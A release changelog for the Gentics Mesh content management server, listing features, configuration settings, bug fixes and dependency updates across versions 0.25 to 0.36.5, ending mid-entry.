0.36.5 (10.07.2019)\n\nicon:plus[] Upload: The `upload.parser` config setting and `MESH_BINARY_DOCUMENT_PARSER` environment variable can be used to control whether uploads should be parsed to extract metadata and contents. Uploads will be parsed by default.\n\nicon:plus[] Search: The `search.includeBinaryFields` config setting and `MESH_ELASTICSEARCH_INCLUDE_BINARY_FIELDS` environment variable can be used to control whether binary field metadata and plain text content should be added to the search index. By default metadata and content will be added to the search index.\n\nicon:plus[] REST: A core library for JSON support (jackson) has been updated.\n\nicon:plus[] GraphQL: The performance when loading nodes via the schema field has been improved.\n\nicon:plus[] Core: Various internal calls have been improved to increase read performance.\n\nicon:check[] Search: Fixed root cause of unnecessary full sync which could occur during schema migrations.\n\n[[v0.36.4]]\n== 0.36.4 (05.07.2019)\n\nicon:check[] GraphQL: Fixed a bug that caused an error when filtering a node from a schema context that has no content in the default language.\n\nicon:plus[] Graph: The `storage.synchronizeWrites` config setting and `MESH_GRAPH_SYNC_WRITES` environment variable can be used to control whether write operations should be executed synchronously. By default write operations are handled asynchronously.\n\nicon:check[] Core: Performance of schema migration has been improved.\n\n[[v0.36.3]]\n== 0.36.3 (04.07.2019)\n\nicon:plus[] Search: Two new options have been added to the mesh search configuration. When the encoded request length exceeds the new `bulkLengthLimit`, no new documents will be added to the bulk and the bulk will be sent to Elasticsearch. The new `retryLimit` causes Gentics Mesh to drop a request to Elasticsearch after the configured limit has been reached. link:https:\/\/github.com\/gentics\/mesh\/issues\/784[#784]\n\nicon:check[] Search: Backpressure for handling index requests has been improved. This reduces memory usage when indexing large amounts of data in a short period of time. link:https:\/\/github.com\/gentics\/mesh\/issues\/785[#785]\n\nicon:check[] Search: Some default configuration values have been changed. `timeout`: `8000` -> `60000`, `bulkLimit`: `2000` -> `100`. These changes will not be applied to existing configurations.\n\nicon:check[] REST: Various branch specific internal checks have been updated to fix potential error cases. link:https:\/\/github.com\/gentics\/mesh\/issues\/787[#787]\n\nicon:check[] Logging: The default logging configuration now includes the Java class for each log message.\n\n[[v0.36.2]]\n== 0.36.2 (02.07.2019)\n\nicon:check[] Search: Encoding issues which happen on systems which were not using `UTF-8` as default locale have been fixed by updating the underlying Elasticsearch client. link:https:\/\/github.com\/gentics\/mesh\/issues\/498[498]\n\nicon:plus[] Search: It is now possible to use encrypted and authenticated connections between Gentics Mesh and Elasticsearch. New settings and environment variables have been added. Details can be found in the link:{{< relref \"elasticsearch.asciidoc\" >}}#_security[Elasticsearch documentation] link:https:\/\/github.com\/gentics\/mesh\/issues\/759[#759]\n\nicon:plus[] Security: The 'spring-security' library has been updated.\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.21\n\nicon:plus[] GraphQL: You can now track ingoing node references. See the link:{{< relref \"graphql.asciidoc\" >}}#_loading_ingoing_references[example] in the documentation.\n\nicon:check[] Search: Fixed a bug that caused configured timeouts to not be applied correctly.\n\n[[v0.36.1]]\n== 0.36.1 (18.06.2019)\n\nicon:plus[] Core: Support for Java 11 runtime has been added.\n\nicon:plus[] Docker: The base image of the `gentics\/mesh` and `gentics\/mesh-demo` images have been updated to use the `adoptopenjdk\/openjdk11:x86_64-alpine-jre-11.0.3_7` image.\n\nicon:plus[] Docker: The included Elasticsearch version has been updated to version 6.8.0. Please note that support for embedded Elasticsearch will be dropped in the future.\n\nicon:check[] REST: The deletion of microschemas which contain changes has been fixed. Previously a `NotImplementedException` was thrown for microschemas which contained changes. link:https:\/\/github.com\/gentics\/mesh\/issues\/589[#589]\n\nicon:check[] REST: Error messages should now always be wrapped in JSON. Previously, internal server errors were returned as plain text.\n\nicon:check[] GraphQL: Fixed a bug that caused the default language of a node to be fetched when loading a node list of a micronode.\n\nicon:plus[] Core: Various internal structures and dependencies were re-organized and refactored.\n\nicon:plus[] UI: The default set of enabled languages within the `mesh-ui-config.js` file has been updated to include more languages.\n\n[[v0.36.0]]\n== 0.36.0 (12.06.2019)\n\nCAUTION: Java Rest Client\n\n[quote]\n____\n\nThe default field values for `NodeResponse` and `AbstractGenericRestResponse` has been updated.\n\nThe following values have been changed:\n\n* `AbstractGenericRestResponse#permissions`\n* `NodeResponse#tags`\n* `NodeResponse#childrenInfo`\n* `NodeResponse#container`\n* `NodeResponse#fields`\n* `NodeResponse#breadcrumb`\n\nThe `NodeResponse#isContainer` method has been deprecated and was replaced by `NodeResponse#getContainer`\n\nApplications which use affected models will most likely not need to updated since the returned response will always set the affected fields.\n____\n\nicon:plus[] REST: The `?fields` query parameter which can be used to filter response properties will now work more granularly on node responses.\n\nCAUTION: Custom node migration scripts have been removed.\n\n[quote]\n____\n\nThe script system was a source of possible errors and performance problems. Also, the nashorn javascript engine has been deprecated with the release of Java 11. If you need to change data for a migration, use the REST Api instead.\n____\n\nicon:check[] REST: Fixed a bug that sometimes caused a wrong image to be sent to the client when using image manipulation. link:https:\/\/github.com\/gentics\/mesh\/issues\/669[#669]\n\nicon:plus[] REST: Error messages now contain the property `i18nKey`. This allows for easy identification of different errors.\n\n[[v0.35.0]]\n== 0.35.0 (06.06.2019)\n\nCAUTION: Rest Model: The `BranchResponse#isMigrated` method has been changed to `BranchResponse#getMigrated`.\n\nNOTE: Fetching fields of a node\/micronode in GraphQL requires a different query in `\/api\/v2`. Please refer to the link:https:\/\/github.com\/gentics\/mesh\/issues\/428[#428] and link:https:\/\/github.com\/gentics\/mesh\/issues\/317[#317] for details.\n\nicon:check[] Backup: Fixed `NullPointerException` which occurred when the backup directory was missing and the backup endpoint was invoked. link:https:\/\/github.com\/gentics\/mesh\/issues\/463[#463]\n\nicon:plus[] Core: The core Vert.x library was updated to version `3.7.1`.\n\nicon:check[] Focal point: It is now possible to use the `{apiLatest}\/:projectName\/nodes\/:uuid\/binaryTransform\/:fieldName` to resize and image and set the focal point in one operation.\n\nicon:check[] The `Content-Disposition` header will now contain the UTF-8 and ISO-8859-1 encoded filename. link:https:\/\/github.com\/gentics\/mesh\/issues\/702[#702]\n\nicon:plus[] REST: It is now possible to set a flag that forces a user to change their password on the next login. Take a look at link:{{< relref \"authentication.asciidoc\" >}}#_forcing_user_to_change_password[the documentation] for more information.\n\nicon:check[] REST: Fixed a bug that sometimes caused a wrong image to be responded when using image manipulation. link:https:\/\/github.com\/gentics\/mesh\/issues\/669[#669]\n\n[[v0.34.0]]\n== 0.34.0 (28.05.2019)\n\nicon:bullhorn[] Versioning Enhancements\n\n[quote]\n____\n\nThe versioning system has received various enhancements.\n\nlink:{{< relref \"features.asciidoc\" >}}#auto-purge[Auto Purge]\n\nThe auto purge feature will now automatically purge the previously no longer needed version of a content. You can control this behaviour using the `autoPurge` flag in the `mesh.yml` file.\n\nAdditionally schema's may now contain a `autoPurge` flag to override the setting on a per schema basis.\n\nThe documentation contains detailed information about how versioning can be controlled.\n\nlink:{{< relref \"features.asciidoc\" >}}#_listing_versions[Listing Versions]\n\nVersions of a node can now be listed via REST and GraphQL.\n\nlink:{{< relref \"features.asciidoc\" >}}#_purging_versions[Purging Versions]\n\nVersions can now be purged across projects to reduce disk storage usage.\n____\n\nicon:check[] Java Rest Client: Fixed a bug that prevented automatic reconnection to the eventbus when it did not succeed immediately.\n\nicon:check[] Upload: The document processing library _tika_ has been updated to version `1.21` to fix potential out of memory issues during upload document processing.\n\nicon:check[] Branch Migration: A bug in the branch migration process has been fixed. Previously the wrong version of the content was used as branch root version. The process will now utilize the published version if one exists and otherwise use the draft version. This fix only affected internal data handling.\n\n[[v0.33.1]]\n== 0.33.1 (23.05.2019)\n\nicon:check[] Core: The dependency _hazelcast-kubernetes_ has set to version 1.2.2 to fix a compatibility issue with the used hazelcast version.\n\n[[v0.33.0]]\n== 0.33.0 (20.05.2019)\n\nicon:bullhorn[] Elasticsearch document handling\n\n[quote]\n____\n\nThe support for the Elasticsearch ingest plugin has been removed. The same functionality has been replaced with a much more efficient implementation which extracts the plain text of a document during upload processing. The structure of the generated search index has not changed and thus no modifications on existing search queries is required.\n\nThe plain text will now also be included in the REST and GraphQL response of binary fields.\n\nAn automatic changelog entry has been added which will parse all uploaded documents and extract the plain text. The duration of the execution of this task depends on the amount of documents that need to be parsed.\n\nThe new __mesh.yml__ setting `upload.parserLimit` can be used to control the document parser. See link:{{< relref \"features.asciidoc\" >}}#_text_extraction[Text extraction documentation] for more information.\n____\n\nicon:plus[] Search: The embedded elastichead interface has been removed. It is recommended to use browser extentions like link:https:\/\/chrome.google.com\/webstore\/detail\/elasticsearch-head\/ffmkiejjmecolpfloofpjologoblkegm[ElasticSearch Head for Chrome] instead.\n\nicon:check[] Core: Various internal libraries have been updated (logback, hazelcast-kubernetes, tika)\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.19\n\n[[v0.32.0]]\n== 0.32.0 (08.05.2019)\n\nicon:bullhorn[] Event Handling\n\n[quote]\n____\n\nThe event handling mechanism has been completely overhauled.\n\n*Changes*\n\n* Additional events have been added\n* Event payload includes more information\n* Java Models for events have been added\n\n*API*\n\nThe API class `com.gentics.mesh.MeshEvent` was replaced by `com.gentics.mesh.core.rest.MeshEvent`.\n\nA detailed description of this feature can be found in our link:{{< relref \"events.asciidoc\" >}}[Event Documentation].\n____\n\nicon:bullhorn[] Elasticsearch Handling\n\n[quote]\n____\n\nThe Elasticsearch integration has been overhauled.\n\n*Integration*\n\nElasticsearch synchronization operations have been decoupled from regular write operations.\n\nThis has two main effects. First, regular write operations (e.g. Node Update, Node Create) will not block until the changed data has been synchronized with elasticsearch. This will result in higher overall write performance. Secondly, changes will not be directly visible in Elasticsearch since write operations in Elasticsearch have been decoupled and will be executed asynchronously after a element in Gentics Mesh has been modified. Implementations which highly rely on Gentics Mesh being in sync with ES for each operation may need to be adapted. When using the `\/search` or `\/rawSearch` endpoints in mesh, you can now provide the `?wait=true` query parameter. See details link:{{< relref \"elasticsearch.asciidoc\" >}}#endpoints[here]\n\n*Fixes*\n\nVarious issues with the previous Elasticsearch synchronization mechanism have been addressed.\n\n* Deletion of nodes will now also update documents in the index which reference the deleted node\n* Tag and Tag Family deletion will now correctly update referenced tags, tag families and nodes\n\n*Startup*\n\nGentics Mesh will no longer wait for Elasticsearch during start-up.\n\n*Resilience*\n\nThe resilience for Elasticsearch server issues has been improved. Failed requests will automatically be retried. If too many issues occur Gentics Mesh will automatically invoke an index sync in order to recover from the issue. This sync will be retried until Elasticsearch becomes responsive again.\n\n*Syncing*\n\nThe clear and sync mechanism has been streamlined in order to benefit from other changes like resilience.\n\n____\n\nNOTE: It is not required to reindex documents since the index names and structure has not been changed.\n\nicon:check[] File Handling: The file upload mechanism has been overhauled to address issues with blocked uploads which could occur when uploading multiple files in-parallel.\n\nicon:check[] File Handling: Failed Uploads will now remove temporary files from disk. Previously in some error situations the temporary upload have not been removed.\n\nicon:check[] Permissions: Applying permissions recursively on projects did not affect branches. This has been fixed.\n\nicon:plus[] Permissions: Setting permissions recursively is now done more efficiently.\n\nicon:plus[] Thread Usage: The overall request handling has been refactored to reduce situations in which the event-loop threads could be blocked. The request handling code has been unified.\n\nicon:plus[] Core: The core Vert.x library was updated to version 3.7.0\n\nicon:plus[] Performance: The overall read performance has been improved. The memory usage has been reduced.\n\n[[v0.31.6]]\n== 0.31.6 (27.05.2018)\n\nicon:check[] Java Rest Client: Fixed a bug that prevented automatic reconnection to the eventbus when it did not succeed immediately.\n\n[[v0.31.5]]\n== 0.31.5 (07.05.2019)\n\nicon:check[] REST: The `publish` and `readPublished` permissions are now only shown for nodes.\n\nicon:check[] Core: Creation of schemas with the same name of an existing microschema or vice versa is not allowed anymore. Doing so caused conflicts in GraphQL. link:https:\/\/github.com\/gentics\/mesh\/issues\/597[#597]\n\nicon:check[] Core: A bug in the image transform endpoint has been fixed. Previously nodes which were updated using that endpoint could not be found via webroot anymore. link:https:\/\/github.com\/gentics\/mesh\/issues\/599[#599]\n\nicon:plus[] Job: The endpoint `POST {apiLatest}\/admin\/jobs\/:jobUuid\/process` has been added. It can be used to trigger job processing. The endpoint will also automatically reset a failed job to be queued again. The endpoints `DELETE {apiLatest}\/admin\/jobs\/:jobUuid\/error` and `POST {apiLatest}\/admin\/processJobs` will be removed in a future release. link:https:\/\/github.com\/gentics\/mesh\/issues\/171[#171]\n\nicon:check[] Plugins: A `NullPointerException` has been fixed which has happened when accessing `rc.user().principal()` within a plugin. link:https:\/\/github.com\/gentics\/mesh\/issues\/516[#516]\n\nicon:check[] REST: Creating a schema with a micronode field and the allow option set to `[]` will now allow micronodes of all microschemas. link:https:\/\/github.com\/gentics\/mesh\/issues\/431[#431]\n\nicon:check[] Core: Fixed a bug that caused an internal server error when applying changes to a microschema. link:https:\/\/github.com\/gentics\/mesh\/issues\/591[#591]\n\nicon:check[] UI: Fixed validation issues in microschema lists when updating nodes. Previously validation issues would not be detected by the UI and the node update would fail. link:https:\/\/github.com\/gentics\/mesh-ui\/pull\/202[#202]\n\n[[v0.31.4]]\n== 0.31.4 (11.04.2019)\n\nicon:check[] Schema: The `container` flag in the schema update request is now optional. Omitting the value will no longer cause Gentics Mesh to use the default value `false`. Subsequently the java request model was altered. The `Schema#isContainer` method was replaced with `Schema#getContainer`. Older REST client versions which by default always specified the container flag are still compatible with this change. link:https:\/\/github.com\/gentics\/mesh\/issues\/165[#165]\n\nicon:check[] GraphQL: The permission check for the `nodes` field of the type `Tag` has been fixed. Previously loading tagged nodes for a tag did not return the expected result. The `published` permission for published nodes was not checked correctly. This has been fixed now.\n\nicon:plus[] Logging: The default `logback.xml` file has been updated to include automatic scan of the logging configuration. This change will not be applied to existing configurations.\n\nicon:check[] Schema: It is now possible to reset the `allow` property of string fields. Setting the `allow` to empty array will now no longer restrict the values. Instead it will revert back to the original behaviour and allow all values.\n\nicon:check[] UI: Fixed a bug that caused the node list to jump to the first page on various actions. link:https:\/\/github.com\/gentics\/mesh-ui\/issues\/195[#195]\n\n[[v0.31.3]]\n== 0.31.3 (28.03.2019)\n\nicon:plus[] Logging: The conflict error logging has been improved. Conflict error information in the log will now be more detailed and also include the conflicting field key and versions.\n\nicon:check[] Permissions: A bug in the GraphQL `nodes` field was fixed. Previously branches were not correctly handled and too many nodes would be returned. Additionally the field would not correctly handle the read published permission and also return draft nodes to which no read permission was granted.\n\n[[v0.31.2.1]]\n== 0.31.2.1 (23.08.2019)\n\nicon:plus[] Logging: Additional activity information will be logged when the logger for class `io.vertx.core.eventbus.EventBus` is set to level `DEBUG`.\n\nicon:check[] REST: Fixed a bug which prevented the `DELETE \/api\/v1\/admin\/jobs\/:jobUuid\/error` from resetting the job.\n\n[[v0.31.2]]\n== 0.31.2 (22.03.2019)\n\nicon:plus[] Docker: Default memory settings for the server and demo docker images were updated. The `-Dstorage.diskCache.bufferSize=256` setting has been added for the server image. The setting can be changed using the `JAVA_TOOL_OPTIONS` environment variable. See link:https:\/\/getmesh.io\/docs\/administration-guide\/#_memory_settings[Memory documentation] for more information and recommendations.\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.18.\n\nicon:check[] REST: The `GET {apiLatest}\/:projectName\/nodes\/:nodeUuid\/binary\/:fieldName` endpoint will now always include the `accept-ranges: bytes` header to indicate to the client that it supports range requests. link:https:\/\/github.com\/gentics\/mesh\/issues\/643[#643]\n\nicon:check[] Configuration: The elasticsearch bulk limit can now be configured using the `MESH_ELASTICSEARCH_BULK_LIMIT` environment variable.\n\nicon:check[] Permissions: A bug in the GraphQL permission handling has been fixed. Previously nodes which had only read published permission assigned to them were not returned using the `nodes` field.\n\nicon:check[] Permissions: A bug in the permission handling of the nav root endpoint has been fixed. Previously nodes which had only read published permission assigned to them were not included in the navigation response.\n\n[[v0.31.1]]\n== 0.31.1 (18.03.2019)\n\nicon:plus[] GraphDB Import\/Export: The endpoints `POST {apiLatest}\/admin\/graphdb\/export` and `POST {apiLatest}\/admin\/graphdb\/import` have been added.\n\n[[v0.31.0]]\n== 0.31.0 (13.03.2019)\n\nicon:bullhorn[] Monitoring\n\n[quote]\n____\nThis version of Gentics Mesh introduces the __Monitoring feature__.\n\nThe Gentics Mesh server will now *additionally* to port `8080` also bind to port `8081` in order to provide the new monitoring API. New configuration settings have been added to allow configuration of this server.\n\nNOTE: The monitoring API should not be exposed publicly and will by default only bind to `localhost`.\n\nA detailed description of this feature can be found in our link:{{< relref \"monitoring.asciidoc\" >}}[Monitoring Documentation].\n____\n\nCAUTION: In a future release the following endpoints will be removed from the regular API (Port 8080) since they were moved to the new monitoring server API (Port 8081).\n\n* `GET {apiLatest}\/admin\/status` (Server Status)\n* `GET {apiLatest}\/admin\/cluster\/status` (Cluster Status)\n\nCAUTION: Because of a change in the image resizer, the change below might not apply when an image is already in the cache. To make sure that the changes take effect, the cache in `data\/binaryImageCache\/` must be cleared.\n\nicon:plus[] Image: Quality of manipulated JPEG images can now be configured. The default value has been changed from `0.7` to `0.95`.\n\nicon:plus[] Image: The filter for resizing images can now be configured. The default filter is Lanczos.\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.17.\n\nicon:plus[] REST: The `\/users` endpoint response will now contain a hash of a users roles.\n\nicon:plus[] GraphQL: The `roles` field is now available for user fields, and contains all roles of the respective user.\n\nicon:plus[] GraphQL: The `rolesHash` field is now available for user fields, and contains a hash of all the roles of the respective user. This field does not need any special permissions.\n\nicon:check[] Fixed a bug in the consistency checks which claimed missing user role shortcuts.\n\nicon:check[] Schema: A bug was fixed which prevented the update of the schema field `elasticsearch` property to value null.\n\nicon:plus[] Docker: Default memory settings for the server and demo docker images were added. Default for server is set to `-Xms512m -Xmx512m -XX:MaxDirectMemorySize=256m`. The setting can be changed using the `JAVA_TOOL_OPTIONS` environment variable. See link:https:\/\/getmesh.io\/docs\/administration-guide\/#_memory_settings[Memory documentation] for more information.\n\nicon:check[] The `.vertx` cache folder was moved to the configurable `data\/tmp` folder.\n\n[[v0.30.2]]\n== 0.30.2 (28.02.2019)\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.16 - This update addresses various locking and synchronization issues when clustering was enabled.\n\nicon:check[] Restore: The restore process has been reworked to avoid issues with graph database indices. Additional error handling has been added.\n\nicon:check[] Backup: Backup support for clustered mode has been added. The backup endpoint previously did not work as expected in clustered mode.\n\n[[v0.30.1]]\n== 0.30.1 (15.02.2019)\n\nicon:plus[] GraphQL: nodes can now be loaded via a list of UUIDs.\n\nicon:check[] Java Rest Client: Fixed a bug that occurred when calling `getResponse()` with `getBody()` on a binary response.\n\nicon:check[] Java Rest Client: Fixed a bug in the MeshRestClient#isOneOf helper function.\n\n[[v0.30.0]]\n== 0.30.0 (12.02.2019)\n\nCAUTION: Java Rest Client: The Gentics Mesh Java REST client which was based on Vert.x was replaced with a `OkHttpClient` implementation. Some changes to the client interface were necessary to make the client independent of Vert.x. See link:https:\/\/getmesh.io\/docs\/platforms\/#_java[this example] and the Javadoc for more information.\n\nicon:check[] Clustering: The mesh version will no longer be appended to the node name used for OrientDB clustering. It is recommended to sanitize the `data\/graphdb\/storage\/distributed-db-config.json` file and remove\/rename entries which reference older mesh nodes. Only the active nodes should be listed in the file.\n\nicon:check[] Core: Fixed a bug that caused too long responses on binary range requests.\n\nicon:check[] GraphQL: Fixed a bug when loading a node via path. When the node itself did not exist, the query would return its parent node.\n\n[[v0.29.10]]\n== 0.29.10 (08.02.2019)\n\nicon:check[] Clustering: Cluster stability has been increased by reducing concurrent transaction locks during delete requests.\n\n[[v0.29.9]]\n== 0.29.9 (07.02.2019)\n\nicon:check[] Clustering: Cluster stability has been increased by reducing concurrent transaction locks during create\/update requests.\n\n[[v0.29.8]]\n== 0.29.8 (05.02.2019)\n\nicon:check[] Clustering: The mesh version will no longer be appended to the node name used for OrientDB clustering. It is recommended to sanitize the `data\/graphdb\/storage\/distributed-db-config.json` file and remove\/rename entries which reference older mesh nodes. Only the active nodes should be listed in the file.\n\n[[v0.29.7]]\n== 0.29.7 (05.02.2019)\n\nicon:check[] Clustering: The default write `writeQuorum` has been set to `majority` to increase cluster stability. A `writeQuorum` of `1` can cause synchronization issues.\n\nicon:check[] Elasticsearch: The Elasticsearch synchronization verticle will no longer be deployed when no Elasticsearch has been configured.\n\n[[v0.29.6]]\n== 0.29.6 (01.02.2019)\n\nicon:plus[] Core: The way editor references are stored has been refactored to increase performance and reduce contention during database operations. A changelog entry will be invoked which migrates the data.\n\n[[v0.29.5]]\n== 0.29.5 (31.01.2019)\n\nicon:check[] Clustering: Creation of edges which lead to higher contention in the graph have been removed from job's. Job's will currently no longer reference the creator.\n\nicon:check[] Search: An error which was thrown by outdated branch schema assignments has been suppressed. A warning will be logged instead.\n\n\n[[v0.29.4]]\n== 0.29.4 (28.01.2019)\n\nicon:check[] Restore: A check has been added which will disable the restore operation while running in clustered mode.\n\nicon:check[] Demo: The demo has been fixed. Previously some of the demo files we were missing.\n\n[[v0.29.3]]\n== 0.29.3 (25.01.2019)\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.14\n\nicon:check[] Core: The job processing will no longer be invoked in an interval in order to reduce cluster operation contention. Instead the `{apiLatest}\/admin\/processJobs` endpoint can be used to manually trigger job processing.\n\nicon:check[] Core: Fixed a bug that caused nodes with a slash in their segment field to not be found via webroot.\n\nicon:check[] Restore: A `ClassCastException` has been fixed which could be observed directly after a backup restore operation.\n\nicon:check[] Changelog: The automatic backup of OrientDB configurations which was executed during the 0.29.0 update has been removed.\n\n[[v0.29.2]]\n== 0.29.2 (18.01.2019)\n\nicon:plus[] Changelog: The changelog execution performance has been increased.\n\nicon:plus[] Consistency Checks: Additional consistency checks and repair actions have been added.\n\nicon:check[] Restore: An error will be returned when `{apiLatest}\/admin\/graphdb\/restore` is being invoked in clustered mode. Restoring the database is not possible in this mode.\n\nicon:check[] Elasticsearch: Fixed a bug that caused a schema migration to never be finished. This affected nodes with binaries that are readable by the Elasticsearch Ingest Attachment Processor Plugin.\n\nicon:check[] Image: Resizing images will now use the balanced quality setting. This helps with images that suffered from visible aliasing. To make sure that the changes take effect, the cache in `data\/binaryImageCache\/` must be cleared.\n\n[[v0.29.1]]\n== 0.29.1 (16.01.2019)\n\nCAUTION: Because of a change in the image cache, the change below might not apply when an image is already in the cache. To make sure that the changes take effect, the cache in `data\/binaryImageCache\/` must be cleared.\n\nicon:plus[] Core: Performance of the deletion process has been increased.\n\nicon:plus[] Consistency Checks: Additional consistency checks and repair actions have been added.\n\nicon:plus[] Consistency Checks: The consistency endpoint response will now also list a `repairCount` property which lists the count of repair operations.\n The response will now only contain the first 200 results. The `outputTruncated` property indicates whether the result has been truncated.\n\nicon:check[] Image: Resizing and cropping will no longer transform the image to JPG format but return an image in the original format. When no image writing plugin for this format is available the fallback is PNG.\n\nicon:check[] Core: Node deletion will now also remove connected lists and micronodes. Previously these elements were not properly removed. On large systems this could lead to increased disk usage.\n\n[[v0.29.0]]\n== 0.29.0 (14.01.2019)\n\nCAUTION: The embedded Graph Database was updated from version 2.2.37 to 3.0.13. See required changes below.\n\nicon:plus[] OrientDB 3.0.x: Existing `orientdb-server-config.xml`, `hazelcast.xml`, `default-distributed-db-config.json` configuration files will automatically be moved away and the new configuration files will be created instead.\n\nicon:plus[] OrientDB 3.0.x: A reindex of all vertices and edges will be triggered during the first start-up. This can take some time depending on the database size.\n\nicon:plus[] Memory: The internal overall memory usage has been optimized.\n\nicon:plus[] Core: The way language references are stored has been refactored to increase performance and reduce contention during database operations. A changelog entry will be invoked which migrates the data.\n\nicon:check[] Clustering: The OrientDB 3.0.13 update addresses various issues which were related to clustering.\n\nicon:check[] Migrations: The schema migration code has been optimized for speed and memory usage.\n\nicon:check[] Migrations: Schema migrations will now always be executed on the cluster node which also handled the REST request. Previously the migration was executed on a random node in the cluster.\n\nicon:check[] Core: The internal transaction retry max count has been reduced from 100 to 10 iterations.\n\nicon:check[] Core: The internal transaction handling has been optimized.\n\nicon:check[] Security: A minor security issue has been fixed.\n\n[[v0.28.3]]\n== 0.28.3 (09.01.2019)\n\nicon:check[] GraphQL: Resolved links will now contain the hostname of the target branch, not the latest branch.\n\nicon:check[] Elasticsearch: Search indices are now created sequentially. Parallel creation of indices caused problems when many indices would have to be created.\n\nicon:plus[] Core: When resolving links with type FULL, and the chosen branch is not the latest branch, the query parameter for the branch will be added to the rendered link.\n\nicon:plus[] Java Rest Client: Added new REST client implementation. The `MeshRestOkHttpClientImpl` implementation will replace the current Java client in a future release. It is advised to switch to the new implementation which is based on the OkHttp library instead of Vert.x.\n\n[[v0.28.2]]\n== 0.28.2 (26.11.2018)\n\nicon:check[] Changelog: Enhanced changelog entry fix from release `0.28.1` to fix additional issues.\n\n[[v0.28.1]]\n== 0.28.1 (26.11.2018)\n\nicon:plus[] Java Rest Client: The `version` property of the `NodeUpdateRequest` is now by default set to `draft`. Setting the value to draft will override the conflict detection handling and always compare the posted data with the latest draft version.\n\nicon:plus[] Java Rest Client: The `upsertNode` method has been added to the REST client which can be used to create or update a node.\n\nicon:plus[] Demo: The example uuids and dates in the `{apiLatest}\/raml` response and the documentation are now static and will no longer change between releases. link:https:\/\/github.com\/gentics\/mesh\/issues\/477[#477]\n\nicon:plus[] Core: Deletion of micronode and list field data has been implemented in the core. Previously these elements were not removed from the graph. link:https:\/\/github.com\/gentics\/mesh\/issues\/192[#192]\n\nicon:check[] Changelog: Fixed a bug in the webroot index database migration entry which caused a `ORecordDuplicatedException` changelog error and prevented update and startup of older databases. link:https:\/\/github.com\/gentics\/mesh\/issues\/554[#554], link:https:\/\/github.com\/gentics\/mesh\/issues\/546[#546]\n\nicon:check[] Core: Fixed a bug that caused link:https:\/\/getmesh.io\/docs\/api\/#project__branches__branchUuid__migrateSchemas_post[\/migrateSchemas] to fail when a newer schema version was not assigned to the branch. link:https:\/\/github.com\/gentics\/mesh\/issues\/532[#532]\n\nicon:check[] Core: Nodes are now migrated to the newest schema version when a new branch is created. link:https:\/\/github.com\/gentics\/mesh\/issues\/521[#521]\n\nicon:check[] Core: Fixed a bug that prevented moving a published node in one language to a published container of another language.\n\n[[v0.28.0]]\n== 0.28.0 (20.11.2018)\n\nCAUTION: The property `meshNodeId` of the `{apiLatest}\/` response was renamed to `meshNodeName` to be more consistent.\n\nicon:plus[] REST: It is now possible to set existing or new tags during node creation and node update. Tags that are listed in both of those requests will be created if not found and assigned to the updated or created node.\n\nicon:plus[] Eventbus: It is now possible to register custom eventbus addresses.\n\nicon:plus[] REST: Download of binaries will now support byte range requests. Web media players require this feature in order to support seeking in video streams.\n\nicon:plus[] API: Make OAuth2 Server options overrideable via environment variables.\n\nicon:check[] Permissions: A bug in the permission handling has been fixed. Previously the read permission was also granted when create was granted to elements. link:https:\/\/github.com\/gentics\/mesh\/issues\/562[#562]\n\nicon:check[] Branches: Resolved links will now contain the hostname of the target branch, not the latest branch.\n\nicon:check[] Elasticsearch: The check for the `ingest-attachment` plugin was fixed for installations which were using the `AWS` Elasticsearch service.\n\nicon:check[] REST: A concurrency issue has been fixed which could lead to problems when creating multiple schemas in-parallel.\n\nicon:check[] REST: Fix error message when no node for a content can be found. link:https:\/\/github.com\/gentics\/mesh\/issues\/364[#364]\n\n[[v0.27.2]]\n== 0.27.2 (07.11.2018)\n\nicon:check[] REST: The CPU utilization for download requests has been reduced. link:https:\/\/github.com\/gentics\/mesh\/issues\/530[#530]\n\nicon:plus[] Core: The Gentics Mesh server will now use native bindings to increase HTTP performance on Linux x86_64 platforms.\n\nicon:check[] REST: Branch create requests will now correctly set the path prefix property. The value of the property was previously not used.\n\nicon:check[] REST: Added more detailed error information when accessing a resource without permission. link:https:\/\/github.com\/gentics\/mesh\/issues\/314[#314]\n\n[[v0.27.1]]\n== 0.27.1 (31.10.2018)\n\nicon:plus[] REST: It is now possible to specify a path prefix for branches. When specified, all resolved paths will include the prefix. The webroot endpoint will also utilize the prefix to resolve nodes. The prefix can be set for new projects or for update requests on existing branches.\n\nicon:check[] Java REST Client: Fixed wrong log output information.\n\nicon:check[] REST: Fixed error while fetching jobs for deleted projects.\n\nicon:plus[] Elasticsearch: The index sync will now automatically remove no longer used indices.\n\nicon:check[] REST: Fixed an error that can happen when creating new nodes which contain binary fields that reference a not yet stored binary sha512sum. link:https:\/\/github.com\/gentics\/mesh\/issues\/524[#524]\n\n[[v0.27.0]]\n== 0.27.0 (19.10.2018)\n\nCAUTION: The volumes inside the docker images `gentics\/mesh` and `gentics\/mesh-demo` have been refactored. By default the volumes `\/graphdb`, `\/uploads`, `\/backups`, `\/plugins`, `\/keystore` and `\/config` will be used for the corresponding data. The `\/data` volume and location was removed. Details can be found in the link:{{< relref \"administration-guide.asciidoc\" >}}#_volumes_locations[documentation].\n\nicon:plus[] Configuration: It is now possible to configure the upload limit using the `MESH_BINARY_UPLOAD_LIMIT` environment variable.\n\nicon:plus[] Java REST Client: It is now possible to set the base path of the API via `MeshRestClient#setBaseUri(String uri)`.\n\nicon:check[] Security: A minor security issue has been fixed.\n\nicon:check[] REST: An issue with the ETag generation of user responses has been fixed. link:https:\/\/github.com\/gentics\/mesh\/issues\/489[#489]\n\n[[v0.26.0]]\n== 0.26.0 (15.10.2018)\n\nicon:plus[] Branches: It is now possible to set the \"latest\" branch of a project.\n\nicon:plus[] Branches: It is now possible to create branches based on specific other branches.\n\nicon:plus[] Branches: Branches can now be tagged just like nodes.\n\nicon:plus[] Clustering: The Hazelcast kubernetes autodiscovery plugin was added to Gentics Mesh. It is now possible to use this plugin to discover nodes in an k8s environment. Take a look at our link:{{< relref \"clustering.asciidoc\" >}}#_kubernetes[documentation] for more details.\n\nicon:check[] Java REST Client: Add more detailed error information to `MeshRestClientMessageException` class.\n\n[[v0.25.0]]\n== 0.25.0 (08.10.2018)\n\nicon:plus[] Plugins: It is now possible to override plugin config in a `config.local.yml` file\n\nicon:plus[] Core: The core Vert.x library was updated to version 